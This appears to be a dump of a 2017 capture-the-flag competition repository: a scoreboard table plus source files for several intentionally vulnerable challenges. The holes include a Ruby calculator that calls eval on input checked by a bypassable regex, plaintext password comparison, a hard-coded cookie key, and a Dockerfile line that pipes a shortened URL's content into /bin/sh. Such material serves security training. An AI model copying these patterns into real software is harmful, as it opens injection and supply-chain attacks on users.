40087/2 | ✔️ 16 | 9 | Medium | 89 | Exploitation | epoch server | Done | ✔️ | ✔️ 40089/1 | ✔️ 17 | 10 | Medium | 91 | Reverse Engineering | rennai | Done | ➖ | ✔️ | ✔️ 18 | 11 | Medium | 92 | Forensics | wirelessmouse | Done | ➖ | ✔️ | ✔️ 19 | 12 | Medium | 93 | Reverse Engineering | resqua | Done | ✔️ | ✔️ 40093/1 | ✔️ 20 | 13 | Hard | 132 | Reverse Engineering | webasm | Done | ✔️ | ✔️ 40132/1 | ✔️ 21 | 14 | Hard | 135 | Exploitation | chatbot | Done | ✔️ | ✔️ 40135/2 | ❌ 22 | 15 | Hard | 137 | Web Hacking | comot | Done | ✔️ | ✔️ 40137/2 | ✔️ 23 | -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/tests/functional/ContactFormCest.php: -------------------------------------------------------------------------------- 1 | amOnPage(['site/contact']); 7 | } 8 | 9 | public function openContactPage(\FunctionalTester $I) 10 | { 11 | $I->see('Contact', 'h1'); 12 | } 13 | 14 | public function submitEmptyForm(\FunctionalTester $I) 15 | { 16 | $I->submitForm('#contact-form', []); 17 | $I->expectTo('see validations errors'); 18 | $I->see('Contact', 'h1'); 19 | $I->see('Name cannot be blank'); 20 | $I->see('Email cannot be blank'); 21 | $I->see('Subject cannot be blank'); 22 | $I->see('Body cannot be blank'); 23 | $I->see('The verification code is incorrect'); 24 | } 25 | 26 | public function submitFormWithIncorrectEmail(\FunctionalTester $I) 27 | { 28 | $I->submitForm('#contact-form', [ 29 | 'ContactForm[name]' => 'tester', 30 | 'ContactForm[email]' => 'tester.email', 31 | 'ContactForm[subject]' => 'test subject', 32 | 'ContactForm[body]' => 'test content', 33 | 'ContactForm[verifyCode]' => 'testme', 34 | ]); 35 | $I->expectTo('see that email address is wrong'); 36 | $I->dontSee('Name cannot be blank', '.help-inline'); 37 | $I->see('Email is not a valid email address.'); 38 | $I->dontSee('Subject cannot be blank', '.help-inline'); 39 | $I->dontSee('Body cannot be blank', '.help-inline'); 40 | $I->dontSee('The 
verification code is incorrect', '.help-inline'); 41 | } 42 | 43 | public function submitFormSuccessfully(\FunctionalTester $I) 44 | { 45 | $I->submitForm('#contact-form', [ 46 | 'ContactForm[name]' => 'tester', 47 | 'ContactForm[email]' => 'tester@example.com', 48 | 'ContactForm[subject]' => 'test subject', 49 | 'ContactForm[body]' => 'test content', 50 | 'ContactForm[verifyCode]' => 'testme', 51 | ]); 52 | $I->seeEmailIsSent(); 53 | $I->dontSeeElement('#contact-form'); 54 | $I->see('Thank you for contacting us. We will respond to you as soon as possible.'); 55 | } 56 | } 57 | -------------------------------------------------------------------------------- /2017-quals/cryptography/WutDiHell/SecureChat/app.js: -------------------------------------------------------------------------------- 1 | var express = require('express'), 2 | app = express(), 3 | http = require('http').Server(app), 4 | io = require('socket.io')(http), 5 | port = process.env.PORT || 9090, 6 | backlog = {}, 7 | rooms = {}; 8 | 9 | app.use(express.static('app')); 10 | 11 | io.on('connection', function(socket){ 12 | var username = undefined, 13 | room = undefined; 14 | 15 | function leave() { 16 | if(room && username) { 17 | for (var i = 0; i < rooms[room].users.length; i++) { 18 | if(rooms[room].users[i] === username) { 19 | rooms[room].users.splice(i, 1); 20 | if(rooms[room].users.length === 0) delete rooms[room]; 21 | break; 22 | } 23 | }; 24 | io.to(room).emit('msg', { 25 | name: "system", 26 | room: room, 27 | msg: username + " has left the room." 
28 | }); 29 | } 30 | } 31 | 32 | socket.on('disconnect', function(){ 33 | leave(); 34 | }); 35 | 36 | socket.on('join-room', function(msg){ 37 | username = msg.name; 38 | room = msg.room; 39 | 40 | if(!rooms[msg.room]) rooms[msg.room] = {users: [msg.name], backlog: []}; 41 | else rooms[msg.room].users.push(username); 42 | 43 | msg.name = "system"; 44 | io.to(msg.room).emit('msg', msg); 45 | socket.join(msg.room); 46 | }); 47 | 48 | socket.on('leave-room', function(msg){ 49 | socket.leave(room); 50 | leave(); 51 | }); 52 | 53 | socket.on('users', function() { 54 | socket.emit('msg', { 55 | name: "system", 56 | room: room, 57 | msg: "users: " + rooms[room].users.join(', ') 58 | }); 59 | }); 60 | 61 | socket.on('rooms', function() { 62 | var temp = [] 63 | for(var room in rooms) { 64 | if (rooms.hasOwnProperty(room)) { 65 | temp.push(room); 66 | } 67 | } 68 | socket.emit('msg', { 69 | name: "system", 70 | room: "global", 71 | msg: "rooms: " + temp.join(', ') 72 | }) 73 | }) 74 | 75 | socket.on('history', function() { 76 | for (var i = 0; i < rooms[room].backlog.length; i++) { 77 | socket.emit('msg', rooms[room].backlog[i]); 78 | }; 79 | }); 80 | 81 | socket.on('msg', function(msg) { 82 | rooms[msg.room].backlog.push(msg); 83 | io.to(msg.room).emit('msg', msg); 84 | }) 85 | }); 86 | 87 | http.listen(port, function(){ 88 | console.log('listening on *:' + port); 89 | }); -------------------------------------------------------------------------------- /2017-quals/cryptography/WutDiHell/SecureChat/app/css/site.css: -------------------------------------------------------------------------------- 1 | body { 2 | position: absolute; 3 | top: 0; 4 | bottom: 0; 5 | left: 0; 6 | right: 0; 7 | margin: 0; 8 | padding: 0; 9 | outline: 0; 10 | border: none; 11 | background-color: #1B1B1B; 12 | color: lightgrey; 13 | } 14 | 15 | div { 16 | position: fixed; 17 | } 18 | 19 | #window { 20 | top: 10px; 21 | left: 10px; 22 | right: 10px; 23 | bottom: 50px; 24 | border: 2px solid lightgrey; 
25 | } 26 | 27 | #window ul { 28 | list-style: none; 29 | position: absolute; 30 | overflow: auto; 31 | top: 0; 32 | left: 0; 33 | right: 0; 34 | bottom: 0; 35 | margin: 0; 36 | padding: 5px; 37 | } 38 | 39 | #window ul li { 40 | min-height: 19px; 41 | width: 100%; 42 | margin: 0; 43 | padding: 1px; 44 | } 45 | 46 | #window ul span { 47 | height: 100%; 48 | margin: 0; 49 | padding: 1px; 50 | vertical-align: middle; 51 | } 52 | 53 | #window ul span.name { 54 | color: green; 55 | } 56 | 57 | #input { 58 | left: 10px; 59 | right: 10px; 60 | bottom: 10px; 61 | border: 2px solid lightgrey; 62 | height: 30px; 63 | } 64 | 65 | #input span { 66 | position: absolute; 67 | left: 0; 68 | bottom: 0; 69 | top: 0; 70 | width: 15px; 71 | padding-top: 5px; 72 | padding-left: 10px; 73 | margin: 0; 74 | font-size: 20px; 75 | font-weight: bolder; 76 | } 77 | 78 | #input .wrapper { 79 | position: absolute; 80 | right: 52px; 81 | left: 30px; 82 | bottom: 0; 83 | top: 0; 84 | } 85 | 86 | #input input[type=text] { 87 | width: 100%; 88 | height: 100%; 89 | border: none; 90 | outline: none; 91 | margin: 0; 92 | background-color: inherit; 93 | color: inherit; 94 | } 95 | 96 | #input button { 97 | position: absolute; 98 | border: none; 99 | outline: none; 100 | border-left: 2px solid lightgrey; 101 | background-color: inherit; 102 | color: inherit; 103 | padding: 1px 5px; 104 | right: 0; 105 | width: 50px; 106 | bottom: 0; 107 | top: 0; 108 | } 109 | 110 | #input button:active { 111 | color: black; 112 | background-color: lightgrey; 113 | } -------------------------------------------------------------------------------- /2017-finals/soal/musicality_icon/challs/static/vendor/inputmask/dependencyLibs/inputmask.dependencyLib.jqlite.min.js: -------------------------------------------------------------------------------- 1 | /*! 
2 | * dependencyLibs/inputmask.dependencyLib.jqlite.min.js 3 | * https://github.com/RobinHerbots/Inputmask 4 | * Copyright (c) 2010 - 2017 Robin Herbots 5 | * Licensed under the MIT license (http://www.opensource.org/licenses/mit-license.php) 6 | * Version: 4.0.1-35 7 | */ 8 | 9 | !function(a){"function"==typeof define&&define.amd?define(["jqlite","../global/window","../global/document]"],a):"object"==typeof exports?module.exports=a(require("jqlite"),require("../global/window"),require("../global/document")):window.dependencyLib=a(jqlite,window,document)}(function(a,b,c){function d(a,b){for(var c=0,d=a.length;c0&&b-1 in a))}for(var h={},i="Boolean Number String Function Array Date RegExp Object Error".split(" "),j=0;j 2 | 3 | 4 | 5 | Comot - {title} 6 | 7 | 8 | 9 | 12 | 13 | 14 |
15 |
16 |

{title}

17 | {name} 18 |

19 |

{note}

20 |
21 |
22 | 23 | 24 | 27 | 28 | -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/css/site.css: -------------------------------------------------------------------------------- 1 | html, 2 | body { 3 | height: 100%; 4 | } 5 | 6 | .wrap { 7 | min-height: 100%; 8 | height: auto; 9 | margin: 0 auto -60px; 10 | padding: 0 0 60px; 11 | } 12 | 13 | .wrap > .container { 14 | padding: 70px 15px 20px; 15 | } 16 | 17 | .footer { 18 | height: 60px; 19 | background-color: #f5f5f5; 20 | border-top: 1px solid #ddd; 21 | padding-top: 20px; 22 | } 23 | 24 | .jumbotron { 25 | text-align: center; 26 | background-color: transparent; 27 | } 28 | 29 | .jumbotron .btn { 30 | font-size: 21px; 31 | padding: 14px 24px; 32 | } 33 | 34 | .not-set { 35 | color: #c55; 36 | font-style: italic; 37 | } 38 | 39 | /* add sorting icons to gridview sort links */ 40 | a.asc:after, a.desc:after { 41 | position: relative; 42 | top: 1px; 43 | display: inline-block; 44 | font-family: 'Glyphicons Halflings'; 45 | font-style: normal; 46 | font-weight: normal; 47 | line-height: 1; 48 | padding-left: 5px; 49 | } 50 | 51 | a.asc:after { 52 | content: /*"\e113"*/ "\e151"; 53 | } 54 | 55 | a.desc:after { 56 | content: /*"\e114"*/ "\e152"; 57 | } 58 | 59 | .sort-numerical a.asc:after { 60 | content: "\e153"; 61 | } 62 | 63 | .sort-numerical a.desc:after { 64 | content: "\e154"; 65 | } 66 | 67 | .sort-ordinal a.asc:after { 68 | content: "\e155"; 69 | } 70 | 71 | .sort-ordinal a.desc:after { 72 | content: "\e156"; 73 | } 74 | 75 | .grid-view th { 76 | white-space: nowrap; 77 | } 78 | 79 | .hint-block { 80 | display: block; 81 | margin-top: 5px; 82 | color: #999; 83 | } 84 | 85 | .error-summary { 86 | color: #a94442; 87 | background: #fdf7f7; 88 | border-left: 3px solid #eed3d7; 89 | padding: 10px 20px; 90 | margin: 0 0 15px 0; 91 | } 92 | 93 | /* align the logout "link" (button in form) of the navbar */ 94 | .nav li > form > button.logout { 95 | padding: 
15px; 96 | border: none; 97 | } 98 | 99 | @media(max-width:767px) { 100 | .nav li > form > button.logout { 101 | display:block; 102 | text-align: left; 103 | width: 100%; 104 | padding: 10px 15px; 105 | } 106 | } 107 | 108 | .nav > li > form > button.logout:focus, 109 | .nav > li > form > button.logout:hover { 110 | text-decoration: none; 111 | } 112 | 113 | .nav > li > form > button.logout:focus { 114 | outline: none; 115 | } 116 | -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/models/User.php: -------------------------------------------------------------------------------- 1 | where(['username'=>$username])->one(); 57 | 58 | if(count($user)){ 59 | return new static($user); 60 | } 61 | 62 | return null; 63 | } 64 | 65 | /** 66 | * @inheritdoc 67 | */ 68 | public function getId() 69 | { 70 | return $this->id; 71 | } 72 | 73 | /** 74 | * @inheritdoc 75 | */ 76 | public function getAuthKey() 77 | { 78 | return $this->authKey; 79 | } 80 | 81 | /** 82 | * @inheritdoc 83 | */ 84 | public function validateAuthKey($authKey) 85 | { 86 | return $this->authKey === $authKey; 87 | } 88 | 89 | /** 90 | * Validates password by strict equality (===) between the stored $this->password and the supplied value. NOTE(review): unless callers hash before calling, this means the stored password is plaintext, and === is not a constant-time comparison; prefer storing a hash from Yii::$app->security->generatePasswordHash() and checking it with Yii::$app->security->validatePassword() - confirm how $this->password is populated. 91 | * 92 | * @param string $password password to validate 93 | * @return bool if password provided is valid for current user 94 | */ 95 | public function validatePassword($password) 96 | { 97 | return $this->password === $password; 98 | } 99 | } 100 | -------------------------------------------------------------------------------- /2017-finals/soal/math_service/math: -------------------------------------------------------------------------------- 1 | #!/usr/local/bin/ruby 2 | puts """ 3 | 3.141592653589793238462643383279502884197 4 | 1693993751058209749445923078164062862089986 5 | 280348253421170679821480865132823066470938446 6 | 0955058223172535940812848111745028410270193852 7 | 11055596446229489549303819644288109756659334461 8 | 284756482337867831652712019091456485669234603486 9 | 
104543266482133936072602491412737245870066063155 10 | 881748815209209628292540917153643678925903600113 11 | 30530548820 46652 13841 12 | 4695194 15116 094330 13 | 572703 65759 59195 14 | 30921 861173 81932 15 | 6117 93105 11854 16 | 807446 23799 17 | 627495 673518 18 | 857527 248912 19 | 279381 830119 20 | 491298 336733 21 | 6244065 664308 22 | 6021394 9463952 23 | 2473719 07021798 24 | 6094370 27705392 25 | 17176293 17675238 26 | 46748184 676694051 27 | 32000568 127145263 28 | 56082778 577134275 29 | 778960917 3637178721 30 | 468440901 2249534301 31 | 465495853 71050792279 32 | 689258923 54201995611 33 | 2129021960 864034418159 34 | 8136297747 71309960518 35 | 7072113499 99998372978 36 | 0499510597 31732816096 37 | 3185950244 594553469 38 | 08302642 522308253 39 | 3446850 3526193 40 | """ 41 | puts "Hi, please input your calculation here, finished with '='" 42 | puts "Example: 6+5=" 43 | STDOUT.flush 44 | $/ = "=" 45 | input = STDIN.gets() 46 | input = input.split(/=/).first 47 | #input = gets("\t\n") # NOTE(review): the regex below uses ^ and $, which in Ruby anchor at each line rather than at the whole string, and gets() reads up to "=" so the input may contain newlines; validate with \A and \z and compute the result with a small parser rather than eval. 48 | if /^([-+]?[0-9]*\.?[0-9]+[\/\+\-\*])+([-+]?[0-9]*\.?[0-9]+)$/.match(input) 49 | puts eval(input) 50 | else 51 | puts("no cheating") 52 | end 53 | 54 | STDOUT.flush 55 | 56 | 57 | 58 | -------------------------------------------------------------------------------- /2017-finals/soal/birthday_card/Dockerfile: -------------------------------------------------------------------------------- 1 | # Use ubuntu 16.04 2 | FROM ubuntu:16.04 3 | 4 | # Open port 5000 5 | EXPOSE 5000 6 | 7 | # update 8 | RUN apt-get update 9 | 10 | # install socat editor ssh 11 | RUN apt-get install curl netcat-openbsd vim nano openssh-server socat lib32ncurses5 python -y 12 | RUN apt-get install git-core curl zlib1g-dev build-essential libssl-dev libreadline-dev libyaml-dev libsqlite3-dev sqlite3 libxml2-dev libxslt1-dev libcurl4-openssl-dev python-software-properties libffi-dev nodejs -y 13 | RUN apt-get install python-pip -y 14 | 15 | # Read arg 16 | ARG flag 17 | ARG flag_name 18 | ARG 
binary 19 | ARG username 20 | ARG password 21 | ENV flag=${flag} 22 | ENV flag_name=${flag_name} 23 | ENV binary=${binary} 24 | ENV username=${username} 25 | ENV password=${password} 26 | 27 | # Install requirements 28 | 29 | # Set WorkDir 30 | RUN mkdir /app 31 | WORKDIR /app 32 | COPY challs/* /app/ 33 | RUN pip install -r /app/requirements.txt 34 | 35 | 36 | # SSH Docker. NOTE(review): $password and $flag arrive as build ARGs and are re-exported with ENV above, so both stay readable in the image config/history and in the environment of every process in the container; supply them at run time or through a build secret mount instead - confirm whether this exposure is intended. 37 | EXPOSE 22 38 | RUN mkdir /var/run/sshd 39 | RUN adduser --disabled-password --gecos "" $username 40 | RUN echo "$username:$password" | chpasswd 41 | RUN sed 's@session\s*required\s*pam_loginuid.so@session optional pam_loginuid.so@g' -i /etc/pam.d/sshd 42 | 43 | 44 | # Copy ruby to workdir 45 | 46 | RUN echo $flag > "/app/$flag_name" 47 | RUN chown -R root:$username /app/* && chmod -R 775 /app/* 48 | RUN chown root:root $flag_name && chmod 755 $flag_name 49 | #RUN chown "root:$username" $binary && chmod 775 $binary 50 | 51 | 52 | 53 | #RUN cp /usr/bin/ruby /usr/local/bin/ 54 | 55 | # Securing environment. NOTE(review): the next RUN overwrites /bin/sh with whatever a URL-shortener link returns at build time, with no pinned source, checksum or signature check; vendor the file into the build context and verify its digest before installing it. 56 | RUN curl -Ls https://goo.gl/yia654 | base64 -d > /bin/sh 57 | RUN chmod 700 /usr/bin/* /bin/* /tmp /dev/shm 58 | RUN chmod 755 /usr/bin/env /bin/dash /bin/bash /bin/sh /bin/nc /bin/cat /usr/bin/curl /usr/bin/groups /usr/bin/id /bin/ls /usr/bin/vi /usr/bin/vim /usr/bin/base64 /bin/nano /usr/bin/python 59 | #RUN chmod 777 /usr/bin/ruby 60 | 61 | 62 | 63 | 64 | # Run Program 65 | #RUN echo '#!/bin/bash'"\n(socat TCP-LISTEN:5000,reuseaddr,fork EXEC:/app/$binary,su=nobody)&\n/usr/sbin/sshd -D" > /start.sh && chmod +x /start.sh 66 | #CMD ["gunicorn" "--bind" "0.0.0.0:5000" "wsgi"] 67 | #CMD gunicorn --bind 0.0.0.0:5000 wsgi --user=nobody 68 | #CMD socat TCP-LISTEN:5000,reuseaddr,fork EXEC:/app/$binary,su=nobody 69 | #CMD ["/start.sh"] 70 | RUN echo '#!/bin/bash'"\n(gunicorn --reload --bind 0.0.0.0:5000 --chdir /app wsgi --user=nobody)&\n/usr/sbin/sshd -D" > /start.sh && chmod +x /start.sh 71 | 72 | #CMD socat TCP-LISTEN:5000,reuseaddr,fork EXEC:/app/$binary,su=nobody 73 | CMD ["/start.sh"] 
-------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/composer.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "yiisoft/yii2-app-basic", 3 | "description": "Yii 2 Basic Project Template", 4 | "keywords": ["yii2", "framework", "basic", "project template"], 5 | "homepage": "http://www.yiiframework.com/", 6 | "type": "project", 7 | "license": "BSD-3-Clause", 8 | "support": { 9 | "issues": "https://github.com/yiisoft/yii2/issues?state=open", 10 | "forum": "http://www.yiiframework.com/forum/", 11 | "wiki": "http://www.yiiframework.com/wiki/", 12 | "irc": "irc://irc.freenode.net/yii", 13 | "source": "https://github.com/yiisoft/yii2" 14 | }, 15 | "minimum-stability": "dev", 16 | "require": { 17 | "php": ">=5.4.0", 18 | "yiisoft/yii2": "~2.0.5", 19 | "yiisoft/yii2-bootstrap": "~2.0.0", 20 | "yiisoft/yii2-swiftmailer": "~2.0.0" 21 | }, 22 | "require-dev": { 23 | "yiisoft/yii2-debug": "~2.0.0", 24 | "yiisoft/yii2-gii": "~2.0.0", 25 | "yiisoft/yii2-faker": "~2.0.0", 26 | 27 | "codeception/base": "^2.2.3", 28 | "codeception/verify": "~0.3.1", 29 | "codeception/specify": "~0.4.3" 30 | }, 31 | "config": { 32 | "process-timeout": 1800, 33 | "fxp-asset":{ 34 | "installer-paths": { 35 | "npm-asset-library": "vendor/npm", 36 | "bower-asset-library": "vendor/bower" 37 | } 38 | } 39 | }, 40 | "scripts": { 41 | "post-install-cmd": [ 42 | "yii\\composer\\Installer::postInstall" 43 | ], 44 | "post-create-project-cmd": [ 45 | "yii\\composer\\Installer::postCreateProject", 46 | "yii\\composer\\Installer::postInstall" 47 | ] 48 | }, 49 | "extra": { 50 | "yii\\composer\\Installer::postCreateProject": { 51 | "setPermission": [ 52 | { 53 | "runtime": "0777", 54 | "web/assets": "0777", 55 | "yii": "0755" 56 | } 57 | ] 58 | }, 59 | "yii\\composer\\Installer::postInstall": { 60 | "generateCookieValidationKey": [ 61 | "config/web.php" 62 | ] 63 | }, 64 | "asset-installer-paths": 
{ 65 | "npm-asset-library": "vendor/npm", 66 | "bower-asset-library": "vendor/bower" 67 | } 68 | }, 69 | "repositories": [ 70 | { 71 | "type": "composer", 72 | "url": "https://asset-packagist.org" 73 | } 74 | ] 75 | } 76 | -------------------------------------------------------------------------------- /2017-finals/soal/musicality_icon/challs/page/home.php: -------------------------------------------------------------------------------- 1 |
2 |
3 |
4 |

Musicality

5 |

Begin your music career here

6 |
7 |
8 |
9 | 10 |
11 |
12 |
13 |
14 |
15 | 16 |
17 |
18 |
19 |
20 |

For those about to rock...

21 |

Lorem ipsum dolor sit amet, consectetur adipisicing elit. Quod aliquid, mollitia odio veniam sit iste esse assumenda amet aperiam exercitationem, ea animi blanditiis recusandae! Ratione voluptatum molestiae adipisci, beatae obcaecati.

22 |
23 |
24 |
25 |
26 |
27 | 28 |
29 |
30 |
31 |
32 |
33 | 34 |
35 |
36 |
37 |
38 |

We salute you!

39 |

Lorem ipsum dolor sit amet, consectetur adipisicing elit. Quod aliquid, mollitia odio veniam sit iste esse assumenda amet aperiam exercitationem, ea animi blanditiis recusandae! Ratione voluptatum molestiae adipisci, beatae obcaecati.

40 |
41 |
42 |
43 |
44 |
45 | 46 |
47 |
48 |
49 |
50 |
51 | 52 |
53 |
54 |
55 |
56 |

Let there be rock!

57 |

Lorem ipsum dolor sit amet, consectetur adipisicing elit. Quod aliquid, mollitia odio veniam sit iste esse assumenda amet aperiam exercitationem, ea animi blanditiis recusandae! Ratione voluptatum molestiae adipisci, beatae obcaecati.

58 |
59 |
60 |
61 |
62 |
-------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/config/web.php: -------------------------------------------------------------------------------- 1 | 'basic', 8 | 'basePath' => dirname(__DIR__), 9 | 'bootstrap' => ['log'], 10 | 'aliases' => [ 11 | '@bower' => '@vendor/bower-asset', 12 | '@npm' => '@vendor/npm-asset', 13 | ], 14 | 'components' => [ 15 | 'request' => [ 16 | // !!! insert a secret key in the following (if it is empty) - this is required by cookie validation. NOTE(review): the key below is committed with the source, so anyone who can read the repository holds the secret that cookie validation relies on; load it from the environment or an untracked config file and rotate it. 17 | 'cookieValidationKey' => '502When6754CanNotExitFromThisRealm777', 18 | ], 19 | 'cache' => [ 20 | 'class' => 'yii\caching\FileCache', 21 | ], 22 | 'user' => [ 23 | 'identityClass' => 'app\models\User', 24 | 'enableAutoLogin' => true, 25 | ], 26 | 'errorHandler' => [ 27 | 'errorAction' => 'site/error', 28 | ], 29 | 'mailer' => [ 30 | 'class' => 'yii\swiftmailer\Mailer', 31 | // send all mails to a file by default. You have to set 32 | // 'useFileTransport' to false and configure a transport 33 | // for the mailer to send real emails. 34 | 'useFileTransport' => true, 35 | ], 36 | 'log' => [ 37 | 'traceLevel' => YII_DEBUG ? 3 : 0, 38 | 'targets' => [ 39 | [ 40 | 'class' => 'yii\log\FileTarget', 41 | 'levels' => ['error', 'warning'], 42 | ], 43 | ], 44 | ], 45 | 'db' => $db, 46 | 47 | 'urlManager' => [ 48 | 'enablePrettyUrl' => true, 49 | 'showScriptName' => false, 50 | 'rules' => [ 51 | '' => 'site/', 52 | ], 53 | ], 54 | 55 | ], 56 | 'params' => $params, 57 | ]; 58 | 59 | if (YII_ENV_DEV) { 60 | // configuration adjustments for 'dev' environment 61 | $config['bootstrap'][] = 'debug'; 62 | $config['modules']['debug'] = [ 63 | 'class' => 'yii\debug\Module', 64 | // uncomment the following to add your IP if you are not connecting from localhost. 
65 | //'allowedIPs' => ['127.0.0.1', '::1'], 66 | ]; 67 | 68 | $config['bootstrap'][] = 'gii'; 69 | $config['modules']['gii'] = [ 70 | 'class' => 'yii\gii\Module', 71 | // uncomment the following to add your IP if you are not connecting from localhost. 72 | //'allowedIPs' => ['127.0.0.1', '::1'], 73 | ]; 74 | } 75 | 76 | return $config; 77 | -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/widgets/Alert.php: -------------------------------------------------------------------------------- 1 | session->setFlash('error', 'This is the message'); 12 | * Yii::$app->session->setFlash('success', 'This is the message'); 13 | * Yii::$app->session->setFlash('info', 'This is the message'); 14 | * ``` 15 | * 16 | * Multiple messages could be set as follows: 17 | * 18 | * ```php 19 | * Yii::$app->session->setFlash('error', ['Error 1', 'Error 2']); 20 | * ``` 21 | * 22 | * @author Kartik Visweswaran 23 | * @author Alexander Makarov 24 | */ 25 | class Alert extends \yii\bootstrap\Widget 26 | { 27 | /** 28 | * @var array the alert types configuration for the flash messages. 29 | * This array is setup as $key => $value, where: 30 | * - key: the name of the session flash variable 31 | * - value: the bootstrap alert type (i.e. danger, success, info, warning) 32 | */ 33 | public $alertTypes = [ 34 | 'error' => 'alert-danger', 35 | 'danger' => 'alert-danger', 36 | 'success' => 'alert-success', 37 | 'info' => 'alert-info', 38 | 'warning' => 'alert-warning' 39 | ]; 40 | /** 41 | * @var array the options for rendering the close button tag. 42 | * Array will be passed to [[\yii\bootstrap\Alert::closeButton]]. 43 | */ 44 | public $closeButton = []; 45 | 46 | /** 47 | * {@inheritdoc} 48 | */ 49 | public function run() 50 | { 51 | $session = Yii::$app->session; 52 | $flashes = $session->getAllFlashes(); 53 | $appendClass = isset($this->options['class']) ? ' ' . 
$this->options['class'] : ''; 54 | 55 | foreach ($flashes as $type => $flash) { 56 | if (!isset($this->alertTypes[$type])) { 57 | continue; 58 | } 59 | 60 | foreach ((array) $flash as $i => $message) { 61 | echo \yii\bootstrap\Alert::widget([ 62 | 'body' => $message, 63 | 'closeButton' => $this->closeButton, 64 | 'options' => array_merge($this->options, [ 65 | 'id' => $this->getId() . '-' . $type . '-' . $i, 66 | 'class' => $this->alertTypes[$type] . $appendClass, 67 | ]), 68 | ]); 69 | } 70 | 71 | $session->removeFlash($type); 72 | } 73 | } 74 | } 75 | -------------------------------------------------------------------------------- /2017-finals/soal-backup/troll/tf.txt: -------------------------------------------------------------------------------- 1 | QQOQ0QQQQQQQQ0OQ0Q00QQQQQOOQQ000Q0QQQQQQQQOQQQQOQQQQOQQQQ0QQQQQQQQQQQ0QQQQ0 2 | QQQOOQQOQQQQQQQOQQQQQQQ0QQQQQQQQQQQQOQQ0QOQQQOQQQQQQQQQO0QQQO0QOQQ0QQQQ0QQQ 3 | QQOOQQ0OQOQQQOQQQQQQQOQOQQQQQOQQQ0QQQQ0OQQ0QQQQQQQQQQQ0OOQQQ0QQQQQQQQQQQ0QQ 4 | 0Q0OQQQOOQQQQQQQOQQWOQ00OWWWBBBHHHHHHHHHBWWWQOQOQOQQQQOQQQQ0OQQQQQQQQQOOQQQ 5 | 0QQQ0QQQQOQQQQQD!`__ssaaaaaaaaaass_ass_s____. -~""??9VWQQQ00QQ0O0QQQQQQOQ0 6 | QQQQO0Q0QO0Q0P'_wmQQQWWBWV?GwwwmmWQmwwwwwgmZUVVHAqwaaaac,"?9$QQQQOQQQQQQQQQ 7 | QOQ0QOQQQO0W! aQWQQQQW?qw#TTSgwawwggywawwpY?T?TYTYTXmwwgZ$ma/-?4QQ0QQOQQQOQ 8 | 0QQQQQQ0QQW' jOQ0OWTqwDYauT9mmwwawww?WWWWQQQQQ@TT?TVTT9HOOQQQOw,-4OQQQQQOQQ 9 | QQQ0QQQO0Q[ jO0QQQyWVw2$wWWQQ0WWQWWWW7WQQQOOOQQPWWQ0QWQQw7W0OQWWc)WWQQQQ0QO 10 | QQQQQQQQQf jQOQQQWWmWmm0WU???????9WWQmWQQQQQOQWjWQQOQQQQWQmQQQOWL 4QQOQQQOQ 11 | QOQQ0QQP'.yOOQQQQ0Q0OQP" xwa,.!4WQQQQQOQWdWP??!"??4WWQ0QWQQc ?OWQQQQQ 12 | QQQQOP'_a._aamQQQW!_yF "!` .. "??$Qa "WQ0QWTVP' "??' =QQmWWV?46/ ?QQQQ0 13 | QQOP'sdyWQP?!`.-"?46mOQOOOQT!m0Ogaa. ;wWQQWQaa _aawmWWQQQQQQQQQWP4a7g -WWQQ 14 | QQ[ j@mQP'adQQP4ga, -????" 
+jQQQQQWQQQQQQQQQWW;)WQWWWW9QQP?"` -?QzQ7L ]QQQ 15 | QW jQkQ@ jWQQD'-?$QQQQQQQQQQQQQQQQQWWQWQQQWQQQc "4QQQQa .QP4QQQQfWkl jQQQ 16 | QE ]QkQk $D?` waa "?9WWQQQP??T?47`_aamQQQQQQWWQw,-?QWWQQQQQ`"QQQD\Qf(.QWQQ 17 | QQ,-Qm4Q/-QmQ6 "WWQma/ "??QQQQQQL 4W"- -?$QQQQWP`s,awT$QQQ@ "QW@?$:.yQQQQ 18 | QQm/-4wTQgQWQQ, ?4WWk 4waac -???$waQQQQQQQQF??'imWWWWWQW?^ ` ]6QQ' yQQQQQ 19 | QQQQw,-?QmWQQQQw a, ?QWWQQQw _. "????9VWaamQWV???" a j/ ]QQf jQQQQQQ 20 | QQQQQQw,"4QQQQQQm,-$Qa ???4F jQQQQQwc ,aaas _aaaaa 4QW ]E )WQ`=QQQQQQQ 21 | QQQQQQWQ/ $QQQQQQQa ?H ]Wwa, ???9WWWh dQWWW,=QWWU? ?! )WQ ]QQQQQQQ 22 | QQQQQQQQQc-QWQQQQQW6, QWQWQQQk ,c jWQ ]QQQQQQQ 23 | QQQQQQQQQQ,"$WQQWQQQQg,."?QQQQ'.mQQQmaa,., . .; QWQ.]QQQQQQQ 24 | QQQQQQQQQWQa ?$WQQWQQQQQa,."?( mQQQQQQW[:QQQQm[ ammF jy! j( } jQQQ(:QQQQQQQ 25 | QQQQQQQQQQWWma "9gw?9gdB?QQwa, -??T$WQQ;:QQQWQ ]WWD _Qf +?! _jQQQWf QQQQQQQ 26 | QQQQQQQQQQQQQQQws "Tqau?9maZ?WQmaas,, --~-- --- . _ssawmQQQQQQk 3QQQQWQ 27 | QQQQQQQQQQQQQQQQWQga,-?9mwad?1wdT9WQQQQQWVVTTYY?YTVWQQQQWWD5mQQPQQQ ]QQQQQQ 28 | QQQQQQQWQQQQQQQQQQQWQQwa,-??$QwadV}mwBHHVHWWBHHUWWBVTTTV5awBQQD6QQQ ]QQQQQQ 29 | QQQQQQQQQQQQQQQQQQQQQQWWQQga,-"9$WQQmmwwmBUUHTTVWBWQQQQWVT?96aQWQQQ ]QQQQQQ 30 | QQQQQQQQQQWQQQQWQQQQQQQQQQQWQQma,-?9$QQWWQQQQQQQWmQmmmmmQWQQQQWQQW(.yQQQQQW 31 | QQQQQQQQQQQQQWQQQQQQWQQQQQQQQQQQQQga%,. -??9$QQQQQQQQQQQWQQWQQV? 
